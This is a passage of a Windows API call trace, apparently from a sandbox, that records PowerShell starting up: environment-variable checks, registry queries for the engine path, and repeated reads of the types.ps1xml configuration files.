hToken=0x0, dwFlags=0x0, pszPath=0x2bcc30 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0067.704] CoTaskMemFree (pv=0x2bcc30) [0067.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0067.705] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0067.715] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.716] CoTaskMemFree (pv=0x230110) [0067.717] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.717] CoTaskMemFree (pv=0x230110) [0067.721] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.721] CoTaskMemFree (pv=0x230110) [0067.721] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.721] CoTaskMemFree (pv=0x230110) [0067.723] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d478 | out: phkResult=0x12d478*=0x344) returned 0x0 [0067.724] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x12d48c, lpData=0x0, lpcbData=0x12d488*=0x0 | out: lpType=0x12d48c*=0x1, lpData=0x0, lpcbData=0x12d488*=0x74) returned 0x0 [0067.724] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x12d3fc, lpData=0x0, lpcbData=0x12d3f8*=0x0 | out: lpType=0x12d3fc*=0x1, lpData=0x0, lpcbData=0x12d3f8*=0x74) returned 0x0 [0067.724] CoTaskMemAlloc (cb=0x78) returned 0x26a760 [0067.724] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x12d3cc, lpData=0x26a760, lpcbData=0x12d3c8*=0x74 | out: lpType=0x12d3cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d3c8*=0x74) returned 0x0 [0067.724] CoTaskMemFree (pv=0x26a760) [0067.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0067.724] SetErrorMode (uMode=0x1) returned 0x1 [0067.725] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d350 | out: lpFileInformation=0x12d350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0067.725] SetErrorMode (uMode=0x1) returned 0x1 [0067.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0067.725] SetErrorMode (uMode=0x1) returned 0x1 [0067.725] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d350 | out: lpFileInformation=0x12d350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0067.726] SetErrorMode (uMode=0x1) returned 0x1 [0067.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0067.728] SetErrorMode (uMode=0x1) returned 0x1 [0067.728] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d350 | out: lpFileInformation=0x12d350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0067.728] SetErrorMode (uMode=0x1) returned 0x1 [0067.728] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.728] CoTaskMemFree (pv=0x230110) [0067.730] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.730] CoTaskMemFree (pv=0x230110) [0067.730] GetACP () returned 0x4e4 [0067.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0067.736] SetErrorMode (uMode=0x1) returned 0x1 [0067.737] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348 [0067.737] GetFileType (hFile=0x348) returned 0x1 [0067.737] SetErrorMode (uMode=0x1) returned 0x1 [0067.737] GetFileType (hFile=0x348) returned 0x1 [0067.740] ReadFile (in: hFile=0x348, lpBuffer=0x2e6d490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2e6d490*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.742] ReadFile (in: hFile=0x348, lpBuffer=0x2e6d490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2e6d490*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.743] ReadFile (in: hFile=0x348, lpBuffer=0x2e6d490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2e6d490*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.743] ReadFile (in: hFile=0x348, lpBuffer=0x2e6d490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2e6d490*, lpNumberOfBytesRead=0x12d288*=0xcf3, lpOverlapped=0x0) returned 1 [0067.743] ReadFile (in: hFile=0x348, lpBuffer=0x2e6c8eb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2e6c8eb*, lpNumberOfBytesRead=0x12d288*=0x0, lpOverlapped=0x0) returned 1 [0067.744] ReadFile (in: hFile=0x348, lpBuffer=0x2e6d490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2e6d490*, lpNumberOfBytesRead=0x12d288*=0x0, lpOverlapped=0x0) returned 1 [0067.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0067.746] SetErrorMode (uMode=0x1) returned 0x1 [0067.746] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0067.746] SetErrorMode (uMode=0x1) returned 0x1 [0067.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0067.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x348) returned 0x0 [0067.747] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0 [0067.747] CoTaskMemAlloc (cb=0x5a) returned 0x2d7190 [0067.747] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x2d7190, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0 [0067.747] CoTaskMemFree (pv=0x2d7190) [0067.747] RegCloseKey (hKey=0x348) returned 0x0 [0067.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0067.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0067.788] GetSystemInfo (in: lpSystemInfo=0x12bf20 | out: lpSystemInfo=0x12bf20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0067.788] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0067.798] SetErrorMode (uMode=0x1) returned 0x1 [0067.798] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348 [0067.799] GetFileType (hFile=0x348) returned 0x1 [0067.799] SetErrorMode (uMode=0x1) returned 0x1 [0067.799] GetFileType (hFile=0x348) returned 0x1 [0067.809] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.810] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.810] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.810] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.810] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.810] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.811] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.811] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.811] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.812] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.813] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.813] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.813] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.814] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.814] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.814] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.814] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.816] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.817] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.817] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.817] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.817] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.818] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.818] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.818] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.819] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.819] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.819] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.819] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.820] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.820] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.820] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.820] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.824] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.824] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.824] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.826] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.826] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.827] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.827] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.827] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1000, lpOverlapped=0x0) returned 1 [0067.828] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x1b4, lpOverlapped=0x0) returned 1 [0067.828] ReadFile (in: hFile=0x348, lpBuffer=0x2d363d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d288, lpOverlapped=0x0 | out: lpBuffer=0x2d363d8*, lpNumberOfBytesRead=0x12d288*=0x0, lpOverlapped=0x0) returned 1 [0067.828] CloseHandle (hObject=0x348) returned 1 [0067.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0067.828] SetErrorMode (uMode=0x1) returned 0x1 [0067.828] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0067.828] SetErrorMode (uMode=0x1) returned 0x1 [0067.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0067.829] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x348) returned 0x0 [0067.829] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0 [0067.829] CoTaskMemAlloc (cb=0x5a) returned 0x23ed40 [0067.829] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x23ed40, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, 